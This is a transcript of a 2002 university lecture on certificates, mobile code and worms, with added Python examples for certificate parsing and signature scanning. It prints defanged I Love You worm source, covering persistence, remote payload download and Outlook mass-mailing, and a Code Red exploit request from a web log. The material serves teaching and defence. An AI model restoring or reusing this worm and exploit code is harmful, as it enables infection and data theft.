20771: Computer Security Lecture 4: ATTACK WEEK (PowerPoint PPT presentation transcript)
Provided by: robertth

Transcript and Presenter's Notes

1
20-771 Computer Security, Lecture 4: ATTACK WEEK
  • Robert Thibadeau
  • School of Computer Science
  • Carnegie Mellon University
  • Institute for eCommerce, Fall 2002

2
Today's lecture
  • X.509v3 (usually Public Key) Certificates
  • Break (10 min)
  • Mobile Code
  • Love Bug
  • Code Red
  • Cookies

3
This Week
  • Chapters 4,5 WS
  • on Linux

4
Protocol Stack
  • Application: TELNET, HTTP, SMTP, NNTP, FTP
  • SSL interface (port N)
  • Transport: TCP
  • Internet: IP
  • Network interface: Ethernet, etc.
  • Physical layer
5
What Could Replace SSL?
  • Application: TELNET, HTTP, SMTP, NNTP, FTP
  • SSL interface (port N)
  • Transport: TCP
  • IPSec (sits between TCP and IP, so it protects every application above it)
  • Internet: IP
  • Network interface: Ethernet, etc.
  • Physical layer
6
X.509v3 Certificates
  • More generally used than SSL
  • Used by SSL
  • Used by nearly every major computer security system
  • From older standards groups: ISO/ITU
  • International Organization for Standardization (ANSI is the US member body)
  • International Telecommunication Union (was CCITT: fax, TIFF); a United Nations specialized agency
  • X.509 was first published in 1988
  • ASN.1 (Abstract Syntax Notation One), see www.asn1.com
  • This is used instead of BNF and is pretty arcane, but it includes encoding rules (DER)
  • SGML (predecessor of HTML) used this, as did X.10 financial systems
  • ASN.1 Object Identifier
  • LDAP, ASN.1 OIDs, Microsoft GUIDs
  • Tree starting with world, down through countries, companies, etc. (www.hyperstamps.com is fun)
  • Your international phone number is a legal Object Identifier
  • It is a felony in nearly every country of the world to counterfeit an ISO-issued Object Identifier

7
X.509v3: Where to Get It
  • You have to pay 61 Swiss Francs!
  • www.itu.org -- search on X.509
  • X.509v4 is out
  • Those typical Swiss, always getting rich
  • No, this is how nearly all older standards bodies have worked: they sell copies of their standards
  • Buy them. They are like the RFCs and the W3 Specifications. They will make you one of the few real experts.

8
What is X.509?
  • A means of authenticating a directory (the X.500 directory)
  • Uses public/private key exclusively (and that means RSA for all practical purposes; Sept 21, remember?)
  • A means for chaining certificate authorities
  • Didn't work as planned: people really just chain certificates
  • The information about who you are is hashed and signed by the issuer, so the signature can be checked against the plaintext about who you are in the certificate
  • Serial number; v3 also adds optional unique identifiers and extensions. It's a FELONY to counterfeit this, even in IRAQ!!!

9
X.509 Basic Form
  • Certificate Serial Number
  • (Signed) Public Key for Authentication/Exchange: RSA
  • DateTime and Expiration (Sept 21, 2000!)
  • Who you are: plaintext
  • (Signed) Message Digest for Checking on Message Integrity: SHA, MD5
10
Concepts behind X.509
  • user certificate / public key certificate / certificate:
  • "The public keys of a user, together with some other information, rendered unforgeable by encipherment with the private key of the certification authority which issued it."
  • certification path:
  • "An ordered sequence of certificates of objects in the directory information tree which, together with the public key of the initial object in the path, can be processed to obtain that of the final object in the path."

11
X.509 Nomenclature
12
Certificate Definition
  • Certificate SIGNEDSEQUENCE
  • version version Default v1,
  • serialNumber CertificateSerialNumber,
  • signature AlgorithmIdentifier,
  • issuer Name,
  • validity Validity,
  • subject Name,
  • subjectPublicKeyInfo SubjectPublicKeyInfo,
  • issuerUniqueIdentifier ObjectIdentifier, - v3
  • subjectUniqueIdentifier ObjectIdentifier, - v3
  • extensions Extensions,

13
Certificate Defined (cont)
  • Version ::= INTEGER { v1(0), v2(1), v3(2) }
  • CertificateSerialNumber ::= INTEGER
  • AlgorithmIdentifier ::= SEQUENCE { ..stuff about crypto: the algorithm OID and its parameters }
  • Validity ::= SEQUENCE {
  • notBefore Time,
  • notAfter Time }
  • SubjectPublicKeyInfo ::= SEQUENCE {
  • algorithm AlgorithmIdentifier,
  • subjectPublicKey BIT STRING }
  • Time ::= CHOICE {
  • utcTime UTCTime,
  • generalizedTime GeneralizedTime }
  • Extensions ::= SEQUENCE OF Extension
  • like KeyUsage, SubjectAltName (the signature is not an extension; it is computed over the whole SEQUENCE above)

14
X.509v3 Certificate
The mod_ssl "Snake Oil" sample server certificate in PEM form, as it appeared on the slide (some characters, including '+' and the trailing '=' padding, did not survive transcription, so this copy will not decode):
-----BEGIN CERTIFICATE-----
MIIDNjCCApgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkx
FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUG
A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZmljYXRlIEF1dGhv
cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhvcNAQkBFg9jYUBz
bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMTgyMTUxWjCBpzEL
MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25h
a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBgNVBAsTDldlYnNl
cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR8wHQYJKoZIhvcN
AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC554RoVH0dJONqljPBWC72MDNGNy9eXnzejXrczsHs3Pc92Vaat6CpIEEGue
yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9ziYon8jWsbK2aE
L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImWZds8YEFiAwIDAQABo24wbDAbBgNV
HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGGEIBDQQtFittb2Rfc3Ns
IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMBEGCWCGSAGGEIB
AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nTkRDQlBdgCcnhy3
hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafLUMdARVV6BpIGMI
5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJmjSguYCRt91sU4K
s0dfWsdItkw4uQ
-----END CERTIFICATE-----

15
X.509v3 Opened!
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Certificate Authority, CN=Snake Oil CA/Email=ca@snakeoil.dom
        Validity
            Not Before: Oct 21 18:21:51 1999 GMT
            Not After : Oct 20 18:21:51 2001 GMT
        Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Webserver Team, CN=www.snakeoil.dom/Email=www@snakeoil.dom
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):

16
509 Opened 2
                    00:b9:e7:84:68:f9:51:f4:74:93:8d:aa:58:cf:05:
                    6f:82:ef:63:03:34:63:72:f5:e5:e7:cd:e8:d7:ad:
                    cc:ec:1e:cd:cf:73:dd:95:69:ab:7a:0a:92:04:10:
                    6b:9e:c8:6d:bd:c5:a8:1b:d6:8e:c6:8f:62:91:82:
                    95:58:72:67:71:ea:d1:dd:d8:99:05:5b:90:5c:15:
                    57:d6:5c:be:36:3d:5e:2b:7f:dc:e2:62:89:fc:8d:
                    6b:1b:2b:66:84:f8:be:a1:0a:d7:1b:c5:d6:c7:38:
                    66:5d:48:85:99:27:07:3f:d5:5b:3b:d1:2f:fb:22:
                    65:be:65:db:3c:60:41:62:03
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                email:www@snakeoil.dom
            Netscape Comment:
                mod_ssl generated custom server certificate
            Netscape Cert Type:
                SSL Server
    Signature Algorithm: md5WithRSAEncryption
        7a:31:1b:18:19:35:d4:47:9d:ff:9d:39:11:0d:09:41:76:00:
        9c:9e:1c:b7:84:4a:df:98:f3:65:fc:ea:f9:8d:63:a6:ba:e7:
        de:21:7a:82:bc:ce:9d:2b:b9:16:fc:a0:5b:a2:e8:b8:a5:f7:
        c8:29:45:5a:7c:b5:0c:74:04:55:57:a0:69:20:63:08:e4:b9:
        95:14:ad:ec:83:0b:89:d3:5b:ff:f7:48:42:b7:89:13:5a:84:
        fc:60:76:c1:2e:d4:21:ec:fc:d6:80:9a:01:01:8e:cc:26:68:
        d2:82:e6:02:46:df:75:b1:4e:0a:b3:47:5f:5a:c7:48:b6:4c:
        38:b9

17
Date Time
  • Great security technique for authentication
  • Challenge-response: let mother nature be the challenge.
  • Very hard to defeat, since you would have to crack the code too quickly; it can be used to put a time limit on things. This is used by many certificates (notBefore/notAfter).
  • Kerberos uses this in issuing tickets for a limited time.
  • Great security technique for auditability
  • Hash the date-time together with the data and sign it.
  • Requires an authority or both members of the transaction to maintain a copy (you can't deny your signature even if you alter your copy!)

18
X.509 certificate types
  • For people
  • For web sites
  • For companies
  • For organizations inside companies
  • For software
  • Etc. etc. etc.
  • You could have X.509 certificates that certify a
    toaster made a piece of toast.

http://yuan.ecom.cmu.edu/security02/509.doc
19
Bits in the KeyUsage type are as follows
  • a) digitalSignature: for verifying digital signatures that have purposes other than those identified in b), f), or g) below.
  • b) nonRepudiation: for verifying digital signatures used in providing a non-repudiation service which protects against the signing entity falsely denying some action (excluding certificate or CRL signing, as in f) or g) below).
  • c) keyEncipherment: for enciphering keys or other security information, e.g. for key transport. (EXCHANGE)
  • d) dataEncipherment: for enciphering user data, but not keys or other security information as in c) above.
  • e) keyAgreement: for use as a public key agreement key.
  • f) keyCertSign: for verifying a CA's signature on certificates.
  • g) cRLSign: for verifying a CA's signature on CRLs.
  • h) encipherOnly: public key agreement key for use only in enciphering data when used with the keyAgreement bit also set (meaning with other key usage bits set is undefined).
  • i) decipherOnly: public key agreement key for use only in deciphering data when used with the keyAgreement bit also set.
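An added worked example (not from the lecture), in Python: the DER encoding of the KeyUsage BIT STRING listed above, including the unused-bits octet and the rule that trailing zero bits are dropped (a CA certificate's keyCertSign plus cRLSign comes out as 03 02 01 06), and the Time CHOICE from slide 13 with the two-digit-year pivot of UTCTime, applied to the date-time check of slide 17. The function names and sample values are constructed for the demo; the validity dates are those of the Snake Oil certificate shown earlier.

```python
# Added example: DER KeyUsage encode/decode and X.509 Time parsing, pure Python.
# Nothing here is lecture code; sample values are constructed for the demo.
from datetime import datetime, timezone

# KeyUsage bit numbers (X.509 / RFC 5280). Bit 0 is the most significant bit
# of the first content octet of the BIT STRING; bit 8 lands in a second octet.
KEY_USAGE_BITS = [
    "digitalSignature", "nonRepudiation", "keyEncipherment",
    "dataEncipherment", "keyAgreement", "keyCertSign", "cRLSign",
    "encipherOnly", "decipherOnly",
]


def encode_key_usage(names):
    """Return the DER TLV (tag 0x03) for a KeyUsage value with these bits set."""
    field = 0
    for n in names:
        field |= 1 << (15 - KEY_USAGE_BITS.index(n))  # 16-bit big-endian field
    body = field.to_bytes(2, "big").rstrip(b"\x00")  # DER: drop trailing zero octets
    if not body:
        return b"\x03\x01\x00"                         # nothing set: only the unused-bits octet
    unused = (body[-1] & -body[-1]).bit_length() - 1   # trailing zero bits of the last octet
    content = bytes([unused]) + body
    return b"\x03" + bytes([len(content)]) + content


def decode_key_usage(der):
    """Parse a DER BIT STRING TLV and return the set of KeyUsage names it asserts."""
    if len(der) < 3 or der[0] != 0x03:
        raise ValueError("not a BIT STRING")
    length = der[1]
    if length >= 0x80 or len(der) != 2 + length:       # short-form length is enough here
        raise ValueError("bad length")
    unused, body = der[2], der[3:]
    if unused > 7 or (not body and unused):
        raise ValueError("bad unused-bits octet")
    # DER strictness: padding bits must be zero and trailing zero bits must be dropped.
    if body and (body[-1] & ((1 << unused) - 1) or not (body[-1] >> unused) & 1):
        raise ValueError("not DER: padding bits set or trailing zero bits kept")
    names = set()
    for i, name in enumerate(KEY_USAGE_BITS):
        octet, bit = divmod(i, 8)
        if octet < len(body) and body[octet] & (0x80 >> bit):
            names.add(name)
    return names


def parse_time(s):
    """Parse the Time CHOICE: UTCTime 'YYMMDDHHMMSSZ' (two-digit year: 50..99 is
    19xx, 00..49 is 20xx per RFC 5280) or GeneralizedTime 'YYYYMMDDHHMMSSZ'."""
    if not s.endswith("Z"):
        raise ValueError("certificate times must be in Zulu (UTC)")
    digits = s[:-1]
    if len(digits) == 12:                              # UTCTime
        yy = int(digits[:2])
        digits = f"{1900 + yy if yy >= 50 else 2000 + yy}{digits[2:]}"
    elif len(digits) != 14:                            # GeneralizedTime
        raise ValueError("unrecognized time syntax")
    return datetime.strptime(digits, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def is_valid_at(not_before, not_after, now):
    """True when notBefore <= now <= notAfter; all three in X.509 time syntax."""
    return parse_time(not_before) <= parse_time(now) <= parse_time(not_after)


if __name__ == "__main__":
    ca = encode_key_usage(["keyCertSign", "cRLSign"])
    print(ca.hex(), sorted(decode_key_usage(ca)))      # 03020106 ['cRLSign', 'keyCertSign']
    # The Snake Oil server certificate's validity window, checked on Sept 21, 2000.
    print(is_valid_at("991021182151Z", "011020182151Z", "20000921120000Z"))  # True
```

The decoder rejects 03 02 00 06, which is a legal BER encoding of the same two bits but not DER; a verifier that accepts it is accepting more than one byte sequence for one value, which is exactly what the signature over the TBSCertificate is supposed to pin down.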

20
What's Wrong with Them
  • Classic HORRIBLE USER INTERFACE ASSOCIATED WITH GOOD CRYPTOGRAPHY
  • You have to apply to a root CA for one
  • They invade your privacy
  • They make you PAY
  • They make them last only one year
  • Funwork: Go to Thawte (www.verisign.com) and get a free personal certificate for your mail browser (Outlook, Eudora, or Netscape)

21
X.509v3
  • Contains signed (not encrypted) information that the source can communicate to you with authority; the certificate itself is public.
  • Authenticated, tamper-evident, and it can carry authorization
  • Designed to be employed as the basis for PKI chaining authority
  • Pass something up the chain for approval (signing) to provide the absolute authority
  • I.e., the President's office confirms such and such directive.

22
Break!
23
Active Content, Also called Mobile Code
  • Web browsers can download and execute software automatically without warning.
  • Software may damage the user's system or violate privacy.
  • Administrator's view: this can tunnel through firewall protections.
  • Case: the U.S. Government came close, within two weeks, to an executive order that shut down all mobile code in the government.
  • Failed: this would dumb down Federal employees and make the Government stupid.

24
Threats from Mobile Code
  • Purposefully malicious
  • Moldovan Connection
  • Sexygirls.com and Erotic2000.com
  • Downloaded and ran a "viewer"; the program hung up the phone and made a long distance call to Moldova at $2 per minute.
  • User taken to the site stayed around without knowing the charge.
  • Last few weeks: Some subscribers to Microsoft's MSN TV service have been struck with a virus that causes their set-top box to dial 911. Ryan Permeh, senior research engineer at eEye Digital Security, said the virus probably was not intended to target MSN TV users.
  • I Love You worm: probable accidental escape.
  • Big programs have bugs
  • Other people will exploit those bugs

25
Traditional Threats
  • Trojan Horses: Very serious. Often used for spying (e.g., change the login program to create a back door).
  • Virus: Code that replicates itself and inserts into an executable program or file.
  • Macro viruses: Viruses written in the macro language of a word processor or other trusted program. Becomes infectious on other documents.
  • Rabbits: Programs that make many copies of themselves. Standalone. Denial of service.
  • Worms: Similar, but spread across a network.

26
Many Many Threats
  • I Love You
  • Opening email that says "I Love You" from a person you know: Trojan Horse
  • Reads your address book: Privacy Violation
  • Deletes image files: Havoc
  • Across the network: Worm
  • Demonstrated
  • Microsoft Outlook could execute seriously destructive and intrusive active content without the user's control.

27
Silent Information Thieves!
  • Access log: my NeXT machine in my office (BSD 4.2) (/private/adm/network)
  • May  9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173
  • May  9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net) lookup failure
  • May  9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173
  • May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.com
  • May 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.com
  • May 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.com
  • May 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.ca
  • May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4
  • May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4
  • May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4
  • May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4
  • May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.com
  • May 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.com
  • May 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.com
  • May 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.edu
  • May 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76
  • May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.com
  • May 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130

28
(slide image only; no transcript)
29
Economic Costs (Computer Economics, 8-01)
  • Love Bug: $8.7 billion
  • Melissa: $1.2 billion
  • Code Red: $2.6 billion
  • 250,000 systems in just nine hours on July 19
  • 150,000 in 24 hours on Aug 1, after warnings
  • Repair costs and loss of productivity, plus the unknown cost of asset loss

30
I Love You Code (virus has been killed: every letter "e" in the listing is replaced by "x", so it cannot run); the file was named vxryfunny.vbs
  • rxm barok -lovxlxttxr(vbx) <i hatx go to school>
  • rxm by spydxr / ispydxr@mail.com / @GRAMMxRSoft Group / Manila,Philippinxs
  • dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow
  • Sxt fso = CrxatxObj("Scripting.FilxSystxmObj")
  • sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1)
  • vbscopy = filx.RxadAll

31
I Love You Code 2
  • main()
  • sxt wscrCrxatxObj("WScript.Shxll")
  • rrwscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Micros
    oft\Windows Scripting Host\Sxttings\Timxout")
  • wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsof
    t\Windows Scripting Host\Sxttings\Timxout",0,"RxG_
    DWORD"
  • Sxt dirwin fso.GxtSpxcialFoldxr(0)
  • Sxt dirsystxm fso.GxtSpxcialFoldxr(1)
  • Sxt dirtxmp fso.GxtSpxcialFoldxr(2)
  • Sxt c fso.GxtFilx(WScript.ScriptFullNamx)
  • c.Copy(dirsystxm"\MSKxrnxl32.vbs")
  • c.Copy(dirwin"\Win32DLL.vbs")
  • c.Copy(dirsystxm"\Vxry Funny.vbs")
  • rxgruns()
  • html()
  • sprxadtoxmail()
  • listadriv()

32
I Love You Code 3 rxgruns()
  • sub rxgruns()
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm"\
    MSKxrnxl32.vbs"
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin
    "\Win32DLL.vbs"
  • Dnrxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
    txrnxt xxplorxr\Download Dirory")
  • rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt
    xxplorxr\Main\Start Pagx","http//www.skyinxt.nxt/
    young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw658
    7345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad"\
    WIN-BUGSFIX.xxx"
  • rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
    txrnxt xxplorxr\Main\Start Pagx","aboutblank"
  • xnd sub

33
I Love You Code 4: Listing the Drives on Your Machine (there were several of these utility-type spies)
  • sub listadriv
  • Dim d,dc,s
  • Sxt dc fso.Drivxs
  • For xach d in dc
  • If d.DrivxTypx 2 or d.DrivxTypx3 Thxn
  • foldxrlist(d.path"\")
  • xnd if
  • Nxxt
  • listadriv s
  • xnd sub

34
I Love You Code 5: re-writing jpg files
  • sub inffilxs(foldxrspxc)
  • sxt f fso.GxtFoldxr(foldxrspxc)
  • sxt fc f.Filxs
  • for xach f1 in fc
  • xxtfso.GxtxxtxnsionNamx(f1.path)
  • if (xxt"vbs") or (xxt"vbx") thxn
  • sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
  • ap.writx vbscopy
  • ap.closx
  • xlsxif(xxt"jpg") or (xxt"jpxg") thxn
  • sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
  • ap.writx vbscopy
  • ap.closx (did same for mp3 files and others)

35
I Love You Code 6: .ini (the mIRC script.ini dropper; the listing still has every "e" replaced by "x")
  • if (xq<>foldxrspxc) thxn
  • if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxn
  • sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")
  • scriptini.WritxLinx "script"
  • scriptini.WritxLinx "mIRC Script"
  • scriptini.WritxLinx " Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"
  • scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"
  • scriptini.WritxLinx ""
  • scriptini.WritxLinx "Khalxd Mardam-Bxy"
  • scriptini.WritxLinx "http://www.mirc.com"
  • scriptini.WritxLinx ""
  • scriptini.WritxLinx "n0on 1JOIN"
  • scriptini.WritxLinx "n1 /if ( nick mx ) halt"
  • scriptini.WritxLinx "n2 /.dcc sxnd nick "&dirsystxm&"\Vxry Funny.HTM"
  • scriptini.WritxLinx "n3"
  • scriptini.closx
  • xq=foldxrspxc
  • nxxt
  • xnd sub
37
I Love You Code 8: spread mail (the listing still has every "e" replaced by "x"; the slide omits the loop-closing statements)
  • sub sprxadtoxmail()
  • sxt rxgxdit=CrxatxObj("WScript.Shxll")
  • sxt out=WScript.CrxatxObj("Outlook.Application")
  • sxt mapi=out.GxtNamxSpacx("MAPI")
  • for ctrlists=1 to mapi.AddrxssLists.Count
  • sxt a=mapi.AddrxssLists(ctrlists)
  • rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&a)
  • if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxn
  • for ctrxntrixs=1 to a.Addrxssxntrixs.Count
  • malxad=a.Addrxssxntrixs(x)
  • rxgad=""
  • rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&malxad)
  • if (rxgad="") thxn
  • sxt malx=out.CrxatxItxm(0)
  • malx.Rxcipixnts.Add(malxad)
  • malx.Subj = "fwd: Jokx"
  • malx.Body = vbcrlf&""
  • malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")
  • malx.Sxnd
  • Sxt out=Nothing
  • Sxt mapi=Nothing
  • xnd sub
38
Silent Attacks
  • I should be obvious it would not be hard to
    create a silent worm that sends mail on file
    systems, files, and address lists (and also all
    your mail on your local machine).
  • We can do this with your web browser too
  • Code Red is only ONE example

39
Virus Checkers
  • Pattern match in secret ways to find viral fingerprints
  • Use a technique called finite state automata to create a very fast search over your files (every signature is checked in one pass, whatever the size of the signature list).
  • If the virus is not known already, it will do damage.
  • Finding silent viruses may be hard.
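The "finite state automata" search is the Aho-Corasick algorithm: all signatures are compiled into one automaton and each file is read exactly once, no matter how many signatures there are. The Python below is an added example, not the lecture's code and not any vendor's scanner; the signature names, the indicator strings and the two sample files are constructed for the demo, and matching is case-insensitive because VBScript is.

```python
# Added example: a signature scanner built on the Aho-Corasick finite automaton.
# The signatures and the sample "files" are constructed for the demo; they are
# indicator strings, not anyone's real antivirus database.
from collections import deque


class SignatureScanner:
    def __init__(self, signatures):
        """signatures: {name: bytes}. Matching is case-insensitive."""
        self.goto = [{}]          # state -> {byte: next state}
        self.fail = [0]           # state -> state for the longest proper suffix
        self.out = [[]]           # state -> names of signatures that end here
        for name, pattern in signatures.items():
            s = 0
            for b in pattern.lower():
                s = self.goto[s].setdefault(b, self._new_state())
            self.out[s].append(name)
        self._build_failure_links()

    def _new_state(self):
        self.goto.append({})
        self.fail.append(0)
        self.out.append([])
        return len(self.goto) - 1

    def _build_failure_links(self):
        # Breadth-first, so a state's failure target (always shallower) is ready first.
        queue = deque(self.goto[0].values())            # depth-1 states fail to the root
        while queue:
            r = queue.popleft()
            for b, s in self.goto[r].items():
                queue.append(s)
                f = self.fail[r]
                while f and b not in self.goto[f]:
                    f = self.fail[f]
                self.fail[s] = self.goto[f].get(b, 0)
                # A match ending here also ends every signature that is a suffix of it.
                self.out[s] = self.out[s] + self.out[self.fail[s]]

    def scan(self, data):
        """One pass over data; returns {signature name: offset just past first match}."""
        hits, s = {}, 0
        for i, b in enumerate(data.lower()):
            while s and b not in self.goto[s]:
                s = self.fail[s]
            s = self.goto[s].get(b, 0)
            for name in self.out[s]:
                hits.setdefault(name, i + 1)
        return hits


DEMO_SIGNATURES = {
    "vbs.outlook-automation": b'CreateObject("Outlook.Application")',
    "vbs.registry-run-key":   b"\\CurrentVersion\\Run\\",
    "vbs.self-copy":          b"WScript.ScriptFullName",
}

# Constructed inputs: the first imitates the shape of a mass-mailing script
# (object creation, self-copy, Run key); it is not any real worm's code.
SAMPLE_FILES = {
    "suspicious.vbs": (b'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
                       b'Set c = fso.GetFile(WScript.ScriptFullName)\r\n'
                       b'Set out = CreateObject("Outlook.Application")\r\n'
                       b'wscr.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Demo", "x.vbs"\r\n'),
    "notes.txt": b"Remember to renew the Snake Oil certificate before Oct 20 2001.\r\n",
}


def scan_files(scanner, files):
    """Returns {filename: sorted list of signature names found}."""
    return {name: sorted(scanner.scan(data)) for name, data in files.items()}


if __name__ == "__main__":
    scanner = SignatureScanner(DEMO_SIGNATURES)
    for fname, found in scan_files(scanner, SAMPLE_FILES).items():
        print(fname, "->", found or "clean")
```

The automaton is built once per signature database; scanning cost is linear in the file size plus the number of matches, which is why the slide's "very fast search" holds even with hundreds of thousands of signatures. It also shows the slide's limit: a signature that is not in the table (a new or polymorphic virus) is never reported.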

40
Authenticode System
  • Windows 2000
  • Running downloaded code is gated on an X.509v3 code-signing certificate from an approved CA (the browser warns or refuses when the signature is missing)
  • Personal Publishers (ID checked with a credit bureau)
  • Commercial Publishers (Articles of Incorporation)
  • Sign a pledge: "reasonable care consistent with prevailing industry standards to keep code free from viruses, malicious code, and other data that may damage, misappropriate, or otherwise interfere with a third party's operations."
  • Remedy: revoke your certificate (HA!)

41
Steps you can Take
  • Don't run as administrator/root
  • Use virus checkers (but watch those companies!!!)
  • Back up often
  • Verify the integrity and authenticity of software.
  • A very good idea is to not accept active code without a certificate that guarantees the author can be found!
  • Same principle as mutually assured destruction, or keep the pilot on the plane! He won't hurt you if you can hurt him.

42
Record of URLs you've visited
  • Browser history file, document cache, and cookies
  • Unix: spools or /var/adm; Windows: /winnt, /windows, program files/netscape, etc.
  • Mobile code can read these.
  • Organization's firewall or proxy server (most have logging capability)
  • ISP's firewall, router, or proxy server.
  • Each of the remote servers you've visited.

43
Web Server
  • Standard logs
  • HTTP header information
  • Date, From, URI, Referrer, Response Status to Request
  • Also from HTTPS! (The server knows!)
  • Logs are essential to security
  • Fancier logs
  • HTTP
  • What's in the forms
  • What's in the responses
  • Really fancy
  • Dynamically changing information based on where you've been.
  • Tracking across web servers.

44
Code Red Log
  • 12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278

45
Code Red I and II (http://www.eeye.com/html/Research/Advisories/AL20010804.html)
  • The %u escapes at the end of the request; %uXXXX is the IIS escape for one 16-bit Unicode code unit:
  • %u9090 %u6858 %ucbd3 %u7801
  • %u9090 %u6858 %ucbd3 %u7801
  • %u9090 %u6858 %ucbd3 %u7801
  • %u9090 %u9090 %u8190 %u00c3 %u0003 %u8b00 %u531b
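As an added example (not part of the lecture or of the eEye advisory), the Python below reads Common Log Format lines, flags /default.ida requests carrying %u escapes, and decodes those escapes the way IIS did (one 16-bit code unit each, stored little-endian), so the NOP sled bytes (0x90) and the repeated "pop eax; push 0x7801cbd3" sequence become visible. The log lines are constructed; the first is the lecture's entry with the X filler shortened, and the function names are this example's own.

```python
# Added example: detect Code Red style .ida probes in web server logs.
# Log lines are constructed; the first reproduces the lecture's entry with
# its filler shortened to 40 bytes.
import re

CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)
U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")
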